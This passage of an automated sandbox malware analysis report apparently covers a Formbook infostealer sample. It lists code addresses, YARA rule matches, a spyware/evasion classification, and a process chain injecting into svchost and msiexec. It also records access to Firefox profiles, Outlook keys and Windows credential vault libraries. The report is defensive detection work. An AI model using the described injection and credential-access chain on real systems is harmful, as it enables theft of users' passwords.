            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0445E3F04_2_0445E3F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045103E64_2_045103E6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04450C004_2_04450C00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04440CF24_2_04440CF2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044F0CB54_2_044F0CB5
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0445AD004_2_0445AD00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044ECD1F4_2_044ECD1F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0444ADE04_2_0444ADE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04468DBF4_2_04468DBF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04450E594_2_04450E59
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450EE264_2_0450EE26
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450EEDB4_2_0450EEDB
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450CE934_2_0450CE93
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04462E904_2_04462E90
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044C4F404_2_044C4F40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04492F284_2_04492F28
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04470F304_2_04470F30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04442FC84_2_04442FC8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0445CFE04_2_0445CFE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044CEFA04_2_044CEFA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044528404_2_04452840
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0445A8404_2_0445A840
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0447E8F04_2_0447E8F0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044368B84_2_044368B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044669624_2_04466962
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044529A04_2_044529A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451A9A64_2_0451A9A6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0444EA804_2_0444EA80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450AB404_2_0450AB40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04506BD74_2_04506BD7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044414604_2_04441460
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450F43F4_2_0450F43F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045075714_2_04507571
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044ED5B04_2_044ED5B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045016CC4_2_045016CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450F7B04_2_0450F7B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044FF0CC4_2_044FF0CC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044570C04_2_044570C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450F0E04_2_0450F0E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045070E94_2_045070E9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0448516C4_2_0448516C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0443F1724_2_0443F172
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0451B16B4_2_0451B16B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0445B1B04_2_0445B1B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0446B2C04_2_0446B2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044F12ED4_2_044F12ED
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044552A04_2_044552A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0443D34C4_2_0443D34C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450132D4_2_0450132D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0449739A4_2_0449739A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044C9C324_2_044C9C32
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450FCF24_2_0450FCF2
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04453D404_2_04453D40
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04501D5A4_2_04501D5A
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04507D734_2_04507D73
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0446FDC04_2_0446FDC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04459EB04_2_04459EB0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450FF094_2_0450FF09
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04451F924_2_04451F92
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450FFB14_2_0450FFB1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044BD8004_2_044BD800
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044538E04_2_044538E0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044599504_2_04459950
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0446B9504_2_0446B950
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044E59104_2_044E5910
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04507A464_2_04507A46
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450FA494_2_0450FA49
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044C3A6C4_2_044C3A6C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044FDAC64_2_044FDAC6
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044EDAAC4_2_044EDAAC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04495AA04_2_04495AA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0450FB764_2_0450FB76
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0448DBF94_2_0448DBF9
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_044C5BF04_2_044C5BF0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0446FB804_2_0446FB80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_00121A004_2_00121A00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0013A5104_2_0013A510
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_001235304_2_00123530
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0011CBB74_2_0011CBB7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0011CBC04_2_0011CBC0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0011CDE04_2_0011CDE0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0011AE604_2_0011AE60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_041BC03D4_2_041BC03D
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_041BB0A84_2_041BB0A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_041BC1CE4_2_041BC1CE
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_041BBCA34_2_041BBCA3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_041BBB844_2_041BBB84
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 044BEA12 appears 86 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 044CF290 appears 105 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04485130 appears 58 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 04497E54 appears 101 times
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0443B970 appears 275 times
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: String function: 00F40A30 appears 46 times
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: String function: 00F29CB3 appears 31 times
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: String function: 00F3F9F2 appears 40 times
            Source: 0XLuA614VK.exe, 00000000.00000003.2046499166.0000000003A43000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0XLuA614VK.exe
            Source: 0XLuA614VK.exe, 00000000.00000003.2044891936.0000000003B9D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0XLuA614VK.exe
            Source: 0XLuA614VK.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@17/7
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F937B5 GetLastError,FormatMessageW,0_2_00F937B5
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F810BF AdjustTokenPrivileges,CloseHandle,0_2_00F810BF
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F816C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F816C3
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F951CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F951CD
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00FAA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00FAA67C
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F9648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00F9648E
            Source: C:\Users\user\Desktop\0XLuA614VK.exeCode function: 0_2_00F242A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00F242A2
            Source: C:\Users\user\Desktop\0XLuA614VK.exeFile created: C:\Users\user\AppData\Local\Temp\autC864.tmpJump to behavior
            Source: 0XLuA614VK.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: msiexec.exe, 00000004.00000002.4488021727.000000000270A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.00000000026DE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2390591193.00000000026DE000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2392407706.00000000026E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 0XLuA614VK.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\0XLuA614VK.exe "C:\Users\user\Desktop\0XLuA614VK.exe"
            Source: C:\Users\user\Desktop\0XLuA614VK.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\0XLuA614VK.exe"
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\0XLuA614VK.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\0XLuA614VK.exe"Jump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\0XLuA614VK.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: 0XLuA614VK.exeStatic file information: File size 1296896 > 1048576
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: 0XLuA614VK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4487730096.000000000005E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
